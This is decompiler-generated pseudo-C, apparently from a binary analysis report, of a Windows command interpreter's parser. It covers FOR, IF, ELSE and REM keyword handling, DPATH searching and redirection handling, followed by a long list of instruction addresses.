												__eflags = __ax - __cx;
												if(__ax == __cx) {
													continue;
												} else {
													__eax =  *0x2dfa8c;
													__ecx = 2 +  *0x2dfa8c * 2;
													__eax = E002B00B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														L212:
														__eax = E002C9287(__ecx);
														__imp__longjmp(0x2db8b8, __edi);
														goto L213;
													} else {
														__edx =  *0x2dfa8c;
														__edx =  &(( *0x2dfa8c)[0]);
														L26:
														__ecx = __eax;
														__esi[0x26] = __eax;
														__eax = E002B1040(__eax, __edx, 0x2dfaa0);
														goto L27;
													}
												}
											}
											goto L218;
										} else {
											__eflags = __ecx;
											if(__ecx != 0) {
												__eflags = __ecx - 8;
												if(__ecx != 8) {
													__eflags = __ecx - 2;
													if(__ecx != 2) {
														__eflags = __ecx - __edi;
														if(__ecx != __edi) {
															L213:
															__eflags = __ecx - 6;
															if(__ecx != 6) {
																__eflags = __ecx - 4;
																if(__ecx != 4) {
																	__eax = E002C82EB(__ecx);
																}
															}
														}
													}
												}
											}
										}
									}
									__eax = 0x25;
									goto L15;
									L32:
									__esi[0x24] = __esi[0x24] | __edi;
									goto L27;
								}
							}
							L15:
							__eflags =  *0x2dfaa0 - __ax;
							if( *0x2dfaa0 != __ax) {
								L216:
								__eax = E002C82EB(__ecx);
							} else {
								__eax =  *0x2dfaa2 & 0x0000ffff;
								__eax = iswspace( *0x2dfaa2 & 0x0000ffff);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									goto L216;
								} else {
									__edx =  *0x2dfaa2 & 0x0000ffff;
									__ecx = L"=,;";
									__esi[0x22] = __edx;
									__eax = E002AD7D4(__ecx, __edx);
									__eflags = __eax;
									if(__eax != 0) {
										goto L216;
									} else {
										__eflags =  *0x2dfa8c - 3;
										if( *0x2dfa8c != 3) {
											goto L216;
										}
									}
								}
							}
							__ecx = __esi[0x1c];
							__edi = 0x2dfaa0;
							_push(0x2dfaa0);
							_push(__ecx);
							__edx = 0x1e;
							__eax = E002A9C73(__ecx, __edx);
							__ecx = L"IN";
							__eax = E002A9C4D(L"IN");
							__ecx = __esi[0x1c];
							_push(0x2dfaa0);
							_push(__ecx);
							__edx = 0x1e;
							__eax = E002A9C73(__ecx, __edx);
							__eax = E002A9936(__ebx);
							__ecx = L"DO";
							__esi[0x1e] = __eax;
							__eax = E002A9C4D(L"DO");
							__ecx = __esi[0x1c];
							_push(0x2dfaa0);
							__ecx = __esi[0x1c] + 0x2c;
							__edx = 8;
							__eax = E002B1040(__esi[0x1c] + 0x2c, __edx);
							__ecx = 0x2b;
							__eax = E002ADC74(__ebx, __ecx);
							__esi[0x20] = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E002C82EB(__ecx);
							}
						}
						_pop(__edi);
						__eax = __esi;
						_pop(__esi);
						return __esi;
					} else {
						__imp___wcsicmp(L"FOR/?", 0x2dfaa0);
						__esp = __esp + 8;
						__eflags = __eax;
						if(__eax == 0) {
							goto L152;
						} else {
							__imp___wcsicmp(L"IF", 0x2dfaa0);
							__esp = __esp + 8;
							__eflags = __eax;
							if(__eax == 0) {
								L148:
								_pop(__esi);
								__edi = 0;
								__imp___wcsicmp(L"IF/?", __edi, __esi, __ecx);
								_pop(__ecx);
								__ecx = 0x2dfaa0;
								__eflags = __eax;
								if(__eflags == 0) {
									__eax = 0;
									__edi = 0;
									 *0x2dfaa4 = __ax;
									__edi = 1;
								}
								__ecx = 0x2c;
								__esi = E002AE9A0(__ecx, __eflags);
								__eflags = __edi;
								if(__edi != 0) {
									__eax = 0x2f;
									 *0x2dfaa0 = __ax;
									__eax = 0x3f;
									 *0x2dfaa2 = __ax;
									__eax = 0;
									 *0x2dfaa4 = __ax;
								} else {
									__ecx = 0;
									__eflags = 0;
									__eax = E002AF030(0);
								}
								__edx = 0x2c;
								__eax = E002ADCE1(__ebx, __edx, __edi);
								__eflags = __al;
								if(__al != 0) {
									__esi[0x1c] = __esi[0x1c] & 0x00000000;
									 *__esi = 0x3c;
									goto L47;
								} else {
									__edi = 0;
									__eflags =  *0x2e3cc9 - __al;
									if( *0x2e3cc9 == __al) {
										L40:
										__edx = 0;
										__ecx = 0;
										__eflags = 0;
										__eax = E002AF300(__eax, 0, 0, 0);
									} else {
										__imp___wcsicmp(L"/I");
										__ecx = 0x2dfaa0;
										_pop(__ecx);
										__eflags = __eax;
										if(__eax == 0) {
											__edi = 0;
											__edi = 1;
										} else {
											goto L40;
										}
									}
									__ecx = 0;
									__eax = E002ACDA2(0);
									__esi[0x1e] = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										__eflags = __edi;
										if(__edi != 0) {
											__eflags =  *__eax - 0x38;
											if( *__eax == 0x38) {
												__eax = __eax[0x1e];
											}
											__eax[0x20] = 2;
										}
									}
									__ecx = 0x2c;
									__eax = E002ADC74(__ebx, __ecx);
									__esi[0x20] = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E002C82EB(__ecx);
									}
									__eax = E002AEEC8();
									__eflags = __eax;
									if(__eax == 0) {
										L47:
										_pop(__edi);
										__eax = __esi;
										_pop(__esi);
										_pop(__ecx);
										return __esi;
									} else {
										__ecx = 0;
										__eax = E002AF030(0);
										__edi = 0x2dfaa0;
										__imp___wcsicmp(L"ELSE");
										_pop(__ecx);
										__ecx = 0x2dfaa0;
										__eflags = __eax;
										if(__eax == 0) {
											__eax =  *0x2dfa8c;
											__ecx =  *0x2dfa8c +  *0x2dfa8c;
											__eax = E002B00B0(__ecx);
											__eflags = __eax;
											if(__eax == 0) {
												__eax = E002C9287(__ecx);
												__imp__longjmp(0x2db8b8, 1);
												asm("int3");
												while(1) {
													L165:
													__eax = 0;
													__edx[__ecx] = __ax;
													while(1) {
														__eax = __esi[0xa];
														__esi = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															break;
														}
														__ecx = __esi[2];
														__edi = __ecx;
														__edx =  &(__edi[1]);
														do {
															__ax =  *__edi;
															__edi =  &(__edi[1]);
															__eflags = __ax - __bx;
														} while (__ax != __bx);
														__edi = __edi - __edx;
														__edi = __edi >> 1;
														__eax = E002B22C0(__ebx, __ecx);
														__ecx = __esi[2];
														__edx =  &(__edi[0]);
														__eax = E002B1040(__esi[2], __edx, __eax);
														__eflags = __esi[4] - __ebx;
														if(__esi[4] == __ebx) {
															__edx = __esi[2];
															__ecx = __edx;
															__edi =  &(__ecx[1]);
															do {
																__ax =  *__ecx;
																__ecx =  &(__ecx[1]);
																__eflags = __ax - __bx;
															} while (__ax != __bx);
															__ecx = __ecx - __edi;
															__ecx = __ecx >> 1;
															__ecx = __ecx - 1;
															__eflags = __ecx - 1;
															if(__ecx > 1) {
																__eflags = __edx[__ecx] - 0x3a;
																if(__edx[__ecx] == 0x3a) {
																	goto L165;
																}
															}
														}
													}
													__edi = _v552;
													__esi = _v548;
													__eflags = __esi - 3;
													if(__esi == 3) {
														__eax =  *0x2e3cd4;
														_v552 = __eax;
														goto L67;
													} else {
														__ecx = 0x10;
														__eax = E002B00B0(__ecx);
														_v552 = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															L86:
															__ebx = 0;
															__ebx = 1;
														} else {
															__ecx =  *0x2e3cd4;
															__eax[6] =  *0x2e3cd4;
															 *0x2e3cd4 = __eax;
															__eax[4] = __edi;
															 *__eax = __esi;
															L67:
															__edi = __edi[0x1a];
															__eflags = __edi;
															if(__edi != 0) {
																__esi = __esi | 0xffffffff;
																__eflags = __esi;
																do {
																	__eflags = __edi[4] - __ebx;
																	if(__edi[4] != __ebx) {
																		goto L82;
																	} else {
																		__imp___get_osfhandle( *__edi);
																		_pop(__ecx);
																		__eflags = __eax - __esi;
																		if(__eax == __esi) {
																			L170:
																			__edi[4] = __esi;
																			goto L75;
																		} else {
																			__imp___get_osfhandle( *__edi);
																			_pop(__ecx);
																			__eflags = __eax - 0xfffffffe;
																			if(__eax == 0xfffffffe) {
																				goto L170;
																			} else {
																				__ecx =  *__edi;
																				__eax = E002B0178(__eax);
																				__eflags = __eax;
																				if(__eax == 0) {
																					__ecx =  *__edi;
																					__eax = E002C9953(__eax,  *__edi);
																					__eflags = __eax;
																					if(__eax != 0) {
																						goto L73;
																					} else {
																						__imp___get_osfhandle( *__edi, __ebx, __ebx, 1);
																						_pop(__ecx);
																						__eax = SetFilePointer(__eax, ??, ??, ??);
																						__eflags = __eax - __esi;
																						if(__eax != __esi) {
																							goto L73;
																						} else {
																							__esi = 0x2e3d00;
																							__eax = E002B274C(0x2e3d00, 0x104, L"%d",  *__edi);
																							_push(0x2e3d00);
																							_push(1);
																							_push(0x40002721);
																							goto L182;
																						}
																					}
																				} else {
																					L73:
																					__ecx =  *__edi;
																					__eax = E002ADBCE(__eax,  *__edi);
																					__edi[4] = __eax;
																					__eflags = __eax - __esi;
																					if(__eax == __esi) {
																						__esi = 0x2e3d00;
																						__eax = E002B274C(0x2e3d00, 0x104, L"%d",  *__edi);
																						_push(0x2e3d00);
																						_push(1);
																						_push(0x2344);
																						L182:
																						__eax = E002AC5A2(__ecx);
																						__esp = __esp + 0x1c;
																						__edi[4] = __ebx;
																						__eax = E002AD937();
																						goto L86;
																					} else {
																						__ecx =  *__edi;
																						__eax = E002ADB92( *__edi);
																						L75:
																						__ecx = __edi[2];
																						__eflags =  *__ecx - 0x26;
																						if( *__ecx == 0x26) {
																							__eax = 0;
																							__ecx[2] = __ax;
																							__eax = __edi[2];
																							__edx =  *__edi;
																							__ecx = __eax[1] & 0x0000ffff;
																							__ecx = (__eax[1] & 0x0000ffff) - 0x30;
																							__eax = E002ADBFC((__eax[1] & 0x0000ffff) - 0x30, __edx);
																							__eflags = __eax - __esi;
																							if(__eax != __esi) {
																								goto L82;
																							} else {
																								goto L183;
																							}
																						} else {
																							__eflags = __edi[8] - 0x3c;
																							_push(__ecx);
																							if(__edi[8] == 0x3c) {
																								__edx = 0x8000;
																								__eax = E002AD120(__ecx, 0x8000);
																								_v548 = __eax;
																								__eflags = __eax - __esi;
																								if(__eax != __esi) {
																									goto L79;
																								} else {
																									__ecx = L"DPATH";
																									__eax = E002B3320(L"DPATH");
																									__eflags = __eax;
																									if(__eax == 0) {
																										goto L184;
																									} else {
																										__ecx = _v24;
																										__eflags = __ecx;
																										if(__ecx == 0) {
																											__ecx =  &_v544;
																										}
																										__eax = SearchPathW(__eax, __edi[2], __ebx, _v16, __ecx, __ebx);
																										__eflags = __eax;
																										if(__eax == 0) {
																											goto L184;
																										} else {
																											__ecx = _v24;
																											__eflags = __ecx;
																											if(__ecx == 0) {
																												__ecx =  &_v544;
																											}
																											_push(__ecx);
																											__edx = 0x8000;
																											goto L78;
																										}
																									}
																								}
																							} else {
																								__edi[6] =  ~(__edi[6]);
																								asm("sbb edx, edx");
																								__edx =  ~(__edi[6]) & 0xfffffe09;
																								__edx = ( ~(__edi[6]) & 0xfffffe09) + 0x301;
																								__eflags = __edx;
																								L78:
																								__eax = E002AD120(__ecx, __edx);
																								_v548 = __eax;
																								__eflags = __eax - __esi;
																								if(__eax == __esi) {
																									L184:
																									__eax = E002AD937();
																									__ecx =  *0x2e3cf0;
																									__eax = E002C985A( *0x2e3cf0);
																									goto L86;
																								} else {
																									L79:
																									__eflags = __eax -  *__edi;
																									if(__eax !=  *__edi) {
																										__edx =  *__edi;
																										__ecx = __eax;
																										__eax = E002ADBFC(__eax,  *__edi);
																										__ecx = _v548;
																										__esi = __eax;
																										__eax = E002ADB92(_v548);
																										__eflags = __esi - 0xffffffff;
																										if(__esi == 0xffffffff) {
																											L183:
																											__eax = E002AD937();
																											__esi = 0x2e3d00;
																											E002B274C(0x2e3d00, 0x104, L"%d",  *__edi) = E002AC5A2(__ecx, 0x2344, 1, 0x2e3d00);
																											goto L86;
																										} else {
																											__eax =  *__edi;
																											__esi = __esi | 0xffffffff;
																											goto L80;
																										}
																									} else {
																										L80:
																										__eflags = __eax - __esi;
																										if(__eax == __esi) {
																											goto L184;
																										} else {
																											__ecx = _v552;
																											_v552[2] = __eax;
																											goto L82;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																	goto L83;
																	L82:
																	__eax = __edi[0xa];
																	__edi = __eax;
																	__eflags = __eax;
																} while (__eax != 0);
															}
														}
													}
													L83:
													__imp__??_V@YAXPAX@Z(_v24);
													_pop(__ecx);
													__ecx = _v4;
													__eax = __ebx;
													_pop(__edi);
													_pop(__esi);
													__ecx = _v4 ^ __ebp;
													__eflags = __ecx;
													_pop(__ebx);
													__eax = E002B6FD0(__ebx, __ebx, __ecx, __edx, __edi, __esi);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
													goto L218;
												}
											} else {
												__edx =  *0x2dfa8c;
												__ecx = __eax;
												__esi[0x22] = __eax;
												__eax = E002B1040(__eax,  *0x2dfa8c, 0x2dfaa0);
												__ecx = 0x2c;
												__eax = E002ADC74(__ebx, __ecx);
												__esi[0x24] = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													__eax = E002C82EB(__ecx);
												}
												goto L47;
											}
										} else {
											__edx = 0;
											__ecx = 0;
											__eflags = 0;
											__eax = E002AF300(__eax, 0, 0, 0);
											goto L47;
										}
									}
								}
							} else {
								__imp___wcsicmp(L"IF/?", 0x2dfaa0);
								__esp = __esp + 8;
								__eflags = __eax;
								if(__eax == 0) {
									goto L148;
								} else {
									__imp___wcsicmp(L"REM", 0x2dfaa0);
									__esp = __esp + 8;
									__eflags = __eax;
									if(__eax == 0) {
										L138:
										_pop(__esi);
										__edi = 0;
										__imp___wcsicmp(L"REM/?", __edi, __esi, __ecx);
										_pop(__ecx);
										__ecx = 0x2dfaa0;
										__eflags = __eax;
										if(__eflags == 0) {
											__eax = 0;
											__edi = 0;
											 *0x2dfaa6 = __ax;
											__edi = 1;
										}
										__ecx = 0x2d;
										__esi = E002AE9A0(__ecx, __eflags);
										__eflags = __edi;
										if(__edi != 0) {
											__eax = 0x2f;
											 *0x2dfaa0 = __ax;
											__eax = 0x3f;
											 *0x2dfaa2 = __ax;
											__eax = 0;
											 *0x2dfaa4 = __ax;
										} else {
											__ecx = 0;
											__eflags = 0;
											__eax = E002AF030(0);
										}
										__edx = 0x2d;
										__eax = E002ADCE1(__ebx, __edx, __edi);
										__eflags = __al;
										if(__al != 0) {
											__esi[0x1c] = __esi[0x1c] & 0x00000000;
											 *__esi = 0x3c;
											goto L95;
										} else {
											__edx = 0;
											__ecx = 0;
											__eax = E002AF300(__eax, 0, 0, 0);
											__eax = E002AEEC8();
											__eflags = __eax;
											if(__eax == 0) {
												L95:
												_pop(__edi);
												__eax = __esi;
												_pop(__esi);
												_pop(__ecx);
												return __esi;
											} else {
												__ecx = 0x20;
												__eax = E002AF030(__ecx);
												__eflags = __eax - 0x4000;
												if(__eax != 0x4000) {
													__edx = 0;
													__ecx = 0;
													__eax = E002AF300(__eax, 0, 0, 0);
													goto L95;
												} else {
													__eax =  *0x2dfa8c;
													__ecx =  *0x2dfa8c +  *0x2dfa8c;
													__eax = E002B00B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														__eax = E002C9287(__ecx);
														__imp__longjmp(0x2db8b8, 1);
														asm("int3");
														__eflags = __esi;
														if(__esi != 0) {
															__eax = 0;
															 *__ebx = __ax;
														}
														_pop(__edi);
														_pop(__esi);
														__eax = __ebx;
														_pop(__ebx);
														return __ebx;
													} else {
														__edx =  *0x2dfa8c;
														__ecx = __eax;
														__esi[0x1e] = __eax;
														__eax = E002B1040(__eax,  *0x2dfa8c, 0x2dfaa0);
														goto L95;
													}
												}
											}
										}
									} else {
										__imp___wcsicmp(L"REM/?", 0x2dfaa0);
										__esp = __esp + 8;
										__eflags = __eax;
										if(__eax == 0) {
											goto L138;
										} else {
											_pop(__esi);
											_push(__ebp);
											__ebp = __esp;
											__esp = __esp - 0x14;
											_push(__ebx);
											_push(__esi);
											__eax =  &_v16;
											_v16 = 0;
											_push(__edi);
											__ecx = 0;
											__eflags = 0;
											_v12 =  &_v16;
											__ebx = E002AE9A0(0, 0);
											_v20 = __ebx;
											while(1) {
												__eax = E002AEEC8();
												__eflags = __eax;
												if(__eax == 0) {
													break;
												}
												__ecx = 1;
												__eax = E002AF030(1);
												__eflags = __eax - 0x4000;
												if(__eax == 0x4000) {
													__ecx = __ebx[0x1e];
													__edi =  *0x2dfa8c;
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx =  &(__ecx[1]);
														do {
															__ax =  *__ecx;
															__ecx =  &(__ecx[1]);
															__eflags = __ax;
														} while (__ax != 0);
														__ecx = __ecx - __edx;
														__edi = __edi + __ecx;
													}
													__ecx = __edi + __edi;
													__esi = E002B00B0(__ecx);
													_v8 = __esi;
													__eflags = __esi;
													if(__esi == 0) {
														__eax = E002C9287(__ecx);
														__imp__longjmp(0x2db8b8, 1);
														asm("int3");
														__eflags =  *0x2dfa90;
														if( *0x2dfa90 != 0) {
															__eax = E002C82EB(__ecx);
														}
														__eax = 0;
														__eflags = 0;
														__eflags =  *0x2dfa88;
														 *0x2cd5c8 = 0;
														if( *0x2dfa88 != 0) {
															__edx = 0;
															__ecx = __esi;
															__eax = E002C8121(__esi, 0);
														}
														__eax = __esi;
														_pop(__edi);
														_pop(__esi);
														_pop(__ebx);
														_pop(__ebp);
														return __eax;
													} else {
														__ecx = __ebx[0x1e];
														__eflags = __ecx;
														if(__ecx != 0) {
															__edx = __edi;
															__ecx = __esi;
															__eax = E002B1040(__esi, __edi, __esi);
														}
														__eax = 0;
														__eflags = __edi;
														if(__edi == 0) {
															L195:
															__eax = 0x80070057;
														} else {
															__eflags = __edi - 0x7fffffff;
															if(__edi > 0x7fffffff) {
																goto L195;
															}
														}
														__eflags = __eax;
														if(__eax < 0) {
															L198:
															__edx = 0;
														} else {
															__eax = 0;
															__ecx = __edi;
															__edx = __esi;
															__eflags = __edi;
															if(__edi == 0) {
																L197:
																__eax = 0x80070057;
																goto L198;
															} else {
																while(1) {
																	__eflags =  *__edx - __ax;
																	if( *__edx == __ax) {
																		break;
																	}
																	__edx =  &(__edx[1]);
																	__ecx = __ecx - 1;
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		continue;
																	} else {
																		goto L197;
																	}
																	goto L114;
																}
																__eflags = __ecx;
																if(__ecx == 0) {
																	goto L197;
																} else {
																	__edx = __edi;
																	__edx = __edi - __ecx;
																	__eflags = __edx;
																}
															}
														}
														L114:
														__eflags = __eax;
														if(__eax >= 0) {
															__eax = _v8;
															__esi = __edi;
															__eax =  &(_v8[__edx]);
															__esi = __edi - __edx;
															__eflags = __esi;
															if(__esi == 0) {
																L120:
																__eax = __eax - 2;
															} else {
																__ecx = __esi;
																__edx =  &(__edx[0x3fffffff]);
																__ecx = __esi - __edi;
																__edi = 0x2dfaa0;
																__edx = __edx + __ecx;
																__edi = 0x2dfaa0 - __eax;
																__eflags = 0x2dfaa0;
																while(1) {
																	__eflags = __edx;
																	if(__edx == 0) {
																		break;
																	}
																	__ecx =  *(__edi + __eax) & 0x0000ffff;
																	__eflags = __cx;
																	if(__cx == 0) {
																		break;
																	} else {
																		 *__eax = __cx;
																		__edx = __edx - 1;
																		__eax =  &(__eax[1]);
																		__esi = __esi - 1;
																		__eflags = __esi;
																		if(__esi != 0) {
																			continue;
																		} else {
																			goto L120;
																		}
																	}
																	goto L122;
																}
																__eflags = __esi;
																if(__esi == 0) {
																	goto L120;
																}
															}
															L122:
															__esi = _v8;
															__ecx = 0;
															__eflags = 0;
															 *__eax = __cx;
														}
														__ebx[0x1e] = __esi;
														continue;
													}
												} else {
													__esi = _v12;
													__ecx = __esi;
													__eax = E002B02B0(__ebx, __esi, __edi, __esi);
													__eflags = __eax;
													if(__eax != 0) {
														__eax =  *__esi;
														do {
															_t77 =  &(__eax[0xa]); // 0x14
															__ebx = _t77;
															__eax =  *__ebx;
															_v12 = __ebx;
															__eflags = __eax;
														} while (__eax != 0);
														__ebx = _v20;
														continue;
													} else {
														__edx = 0;
														__ecx = 0;
														__eflags = 0;
														__eax = E002AF300(__eax, 0, 0, __eax);
														break;
													}
												}
												goto L218;
											}
											__eax = _v16;
											_pop(__edi);
											__ebx[0x1a] = _v16;
											__eax = __ebx;
											_pop(__esi);
											_pop(__ebx);
											__esp = __ebp;
											_pop(__ebp);
											return __ebx;
										}
									}
								}
							}
						}
					}
				}
				L218:
			}























                                              0x002b04a0
                                              0x002b04a0
                                              0x002b04ab
                                              0x002b0557
                                              0x002b055d
                                              0x002b0561
                                              0x002b05da
                                              0x002b05de
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b0563
                                              0x002b0563
                                              0x002b0563
                                              0x002b056d
                                              0x002b056f
                                              0x002b0571
                                              0x002b852b
                                              0x002b8537
                                              0x002b853d
                                              0x002b853e
                                              0x002b8541
                                              0x002b8543
                                              0x002b8546
                                              0x002b8548
                                              0x002b8548
                                              0x002b854a
                                              0x002b854a
                                              0x002b854c
                                              0x002b854e
                                              0x002b854e
                                              0x002b8553
                                              0x002b8553
                                              0x002b8556
                                              0x002b855a
                                              0x002b8560
                                              0x002b8560
                                              0x002a480e
                                              0x002b0577
                                              0x002b0577
                                              0x002b057f
                                              0x002b05e9
                                              0x002b05ef
                                              0x002b0581
                                              0x002b0581
                                              0x002b0590
                                              0x002b0595
                                              0x002b059a
                                              0x002b059a
                                              0x002b05a8
                                              0x002b05aa
                                              0x002b05af
                                              0x002b05af
                                              0x002b05b9
                                              0x002b05bc
                                              0x002b05bf
                                              0x002b05d0
                                              0x002b05d3
                                              0x002b05c1
                                              0x002b05c6
                                              0x002b05cb
                                              0x002b05ce
                                              0x002b05e0
                                              0x002b05e0
                                              0x002b05e5
                                              0x002b05e8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b05ce
                                              0x002b05bf
                                              0x002b0571
                                              0x002b04b1
                                              0x002b04bb
                                              0x002b04c1
                                              0x002b04c4
                                              0x002b04c6
                                              0x002b05f3
                                              0x002b05f3
                                              0x002a9a34
                                              0x002a9a36
                                              0x002a9a3c
                                              0x002a9a3d
                                              0x002a9a3e
                                              0x002a9a40
                                              0x002c1093
                                              0x002c1095
                                              0x002c1097
                                              0x002c109d
                                              0x002c109d
                                              0x002a9a48
                                              0x002a9a49
                                              0x002a9a58
                                              0x002a9a5c
                                              0x002a9a5d
                                              0x002a9a5f
                                              0x002c10a3
                                              0x002c10ab
                                              0x002c10ac
                                              0x002c10b2
                                              0x002c10b4
                                              0x002a9a65
                                              0x002a9a65
                                              0x002a9a65
                                              0x002a9a67
                                              0x002a9a67
                                              0x002a9a6e
                                              0x002a9a6f
                                              0x002a9a74
                                              0x002a9a76
                                              0x002c10bf
                                              0x002c10c3
                                              0x002a9a7c
                                              0x002a9a7c
                                              0x002a9a80
                                              0x002a9a89
                                              0x002a9a8a
                                              0x002a9a8c
                                              0x002a9a8e
                                              0x002a9a8e
                                              0x002a9a8f
                                              0x002a9a99
                                              0x002a9a9f
                                              0x002a9aa0
                                              0x002a9aa1
                                              0x002a9aa3
                                              0x00000000
                                              0x00000000
                                              0x002a9aa9
                                              0x002a9ab3
                                              0x002a9ab9
                                              0x002a9aba
                                              0x002a9abb
                                              0x002a9abd
                                              0x002a9c3b
                                              0x002a9c19
                                              0x002a9c19
                                              0x002a9c1b
                                              0x002a9a8f
                                              0x002a9a99
                                              0x002a9a9f
                                              0x002a9aa0
                                              0x002a9aa1
                                              0x002a9aa3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a9aa3
                                              0x00000000
                                              0x002a9a8f
                                              0x002a9acd
                                              0x002a9ad3
                                              0x002a9ad4
                                              0x002a9ad5
                                              0x002a9ad7
                                              0x002a9bb9
                                              0x002a9bbd
                                              0x002a9bbf
                                              0x002a9bc4
                                              0x002a9bcc
                                              0x002a9bcd
                                              0x002a9bd0
                                              0x00000000
                                              0x002a9bd6
                                              0x002a9bd8
                                              0x002a9bd9
                                              0x002a9bdc
                                              0x00000000
                                              0x002a9be2
                                              0x002a9be2
                                              0x002a9be6
                                              0x002a9c46
                                              0x002a9c46
                                              0x002a9be8
                                              0x002a9bed
                                              0x002a9bf4
                                              0x002a9bf9
                                              0x002a9bfb
                                              0x00000000
                                              0x002a9c01
                                              0x002a9c01
                                              0x002a9c07
                                              0x00000000
                                              0x002a9c07
                                              0x002a9bfb
                                              0x002a9bdc
                                              0x00000000
                                              0x002a9add
                                              0x002a9ae7
                                              0x002a9aed
                                              0x002a9aee
                                              0x002a9aef
                                              0x002a9af2
                                              0x002a9af4
                                              0x002c10d1
                                              0x002c10d4
                                              0x002c10d6
                                              0x002c10db
                                              0x002c10df
                                              0x002c10e1
                                              0x002c10e1
                                              0x002c10e6
                                              0x002c10ee
                                              0x002c10ef
                                              0x002c10f2
                                              0x00000000
                                              0x002c10f8
                                              0x002c10fa
                                              0x002c10fb
                                              0x002c10fe
                                              0x00000000
                                              0x002c1104
                                              0x002c1104
                                              0x002c1109
                                              0x002c1110
                                              0x002c1115
                                              0x002c1117
                                              0x002c1127
                                              0x002c1127
                                              0x002c1132
                                              0x00000000
                                              0x002c1119
                                              0x002c1119
                                              0x002c111f
                                              0x002a9c0a
                                              0x002a9c0f
                                              0x002a9c11
                                              0x002a9c14
                                              0x00000000
                                              0x002a9c14
                                              0x002c1117
                                              0x002c10fe
                                              0x00000000
                                              0x002a9afa
                                              0x002a9afa
                                              0x002a9afc
                                              0x002a9afe
                                              0x002a9b01
                                              0x002a9c25
                                              0x002a9c28
                                              0x002a9c2e
                                              0x002a9c30
                                              0x002c1138
                                              0x002c1138
                                              0x002c113b
                                              0x002c1141
                                              0x002c1144
                                              0x002c114a
                                              0x002c114a
                                              0x002c1144
                                              0x002c113b
                                              0x002a9c30
                                              0x002a9c28
                                              0x002a9b01
                                              0x002a9afc
                                              0x002a9af4
                                              0x002a9b09
                                              0x00000000
                                              0x002a9c41
                                              0x002a9c41
                                              0x00000000
                                              0x002a9c41
                                              0x002a9a8f
                                              0x002a9b0a
                                              0x002a9b0a
                                              0x002a9b11
                                              0x002c1154
                                              0x002c1154
                                              0x002a9b17
                                              0x002a9b17
                                              0x002a9b1f
                                              0x002a9b25
                                              0x002a9b26
                                              0x002a9b28
                                              0x00000000
                                              0x002a9b2e
                                              0x002a9b2e
                                              0x002a9b35
                                              0x002a9b3a
                                              0x002a9b3d
                                              0x002a9b42
                                              0x002a9b44
                                              0x00000000
                                              0x002a9b4a
                                              0x002a9b4a
                                              0x002a9b51
                                              0x00000000
                                              0x00000000
                                              0x002a9b51
                                              0x002a9b44
                                              0x002a9b28
                                              0x002a9b57
                                              0x002a9b5a
                                              0x002a9b5f
                                              0x002a9b60
                                              0x002a9b63
                                              0x002a9b64
                                              0x002a9b69
                                              0x002a9b6e
                                              0x002a9b73
                                              0x002a9b76
                                              0x002a9b77
                                              0x002a9b7a
                                              0x002a9b7b
                                              0x002a9b80
                                              0x002a9b85
                                              0x002a9b8a
                                              0x002a9b8d
                                              0x002a9b92
                                              0x002a9b95
                                              0x002a9b98
                                              0x002a9b9b
                                              0x002a9b9c
                                              0x002a9ba3
                                              0x002a9ba4
                                              0x002a9ba9
                                              0x002a9bac
                                              0x002a9bae
                                              0x002c115e
                                              0x002c115e
                                              0x002a9bae
                                              0x002a9bb4
                                              0x002a9bb5
                                              0x002a9bb7
                                              0x002a9bb8
                                              0x002b04cc
                                              0x002b04d6
                                              0x002b04dc
                                              0x002b04df
                                              0x002b04e1
                                              0x00000000
                                              0x002b04e7
                                              0x002b04f1
                                              0x002b04f7
                                              0x002b04fa
                                              0x002b04fc
                                              0x002b05d4
                                              0x002b05d4
                                              0x002ad812
                                              0x002ad814
                                              0x002ad81a
                                              0x002ad81b
                                              0x002ad81c
                                              0x002ad81e
                                              0x002bb9cb
                                              0x002bb9cd
                                              0x002bb9cf
                                              0x002bb9d5
                                              0x002bb9d5
                                              0x002ad826
                                              0x002ad82c
                                              0x002ad82e
                                              0x002ad830
                                              0x002bb9dd
                                              0x002bb9de
                                              0x002bb9e6
                                              0x002bb9e7
                                              0x002bb9ed
                                              0x002bb9ef
                                              0x002ad836
                                              0x002ad836
                                              0x002ad836
                                              0x002ad838
                                              0x002ad838
                                              0x002ad83f
                                              0x002ad840
                                              0x002ad845
                                              0x002ad847
                                              0x002bb9fa
                                              0x002bb9fe
                                              0x00000000
                                              0x002ad84d
                                              0x002ad84d
                                              0x002ad84f
                                              0x002ad855
                                              0x002ad871
                                              0x002ad873
                                              0x002ad875
                                              0x002ad875
                                              0x002ad877
                                              0x002ad857
                                              0x002ad861
                                              0x002ad867
                                              0x002ad868
                                              0x002ad869
                                              0x002ad86b
                                              0x002ad919
                                              0x002ad91b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ad86b
                                              0x002ad87c
                                              0x002ad87e
                                              0x002ad883
                                              0x002ad886
                                              0x002ad888
                                              0x002ad88a
                                              0x002ad88c
                                              0x002ad921
                                              0x002ad924
                                              0x002ad932
                                              0x002ad932
                                              0x002ad926
                                              0x002ad926
                                              0x002ad88c
                                              0x002ad894
                                              0x002ad895
                                              0x002ad89a
                                              0x002ad89d
                                              0x002ad89f
                                              0x002bba09
                                              0x002bba09
                                              0x002ad8a5
                                              0x002ad8aa
                                              0x002ad8ac
                                              0x002ad8d7
                                              0x002ad8d7
                                              0x002ad8d8
                                              0x002ad8da
                                              0x002ad8db
                                              0x002ad8dc
                                              0x002ad8ae
                                              0x002ad8ae
                                              0x002ad8b0
                                              0x002ad8b5
                                              0x002ad8c0
                                              0x002ad8c6
                                              0x002ad8c7
                                              0x002ad8c8
                                              0x002ad8ca
                                              0x002ad8dd
                                              0x002ad8e2
                                              0x002ad8e5
                                              0x002ad8ea
                                              0x002ad8ec
                                              0x002bba13
                                              0x002bba1f
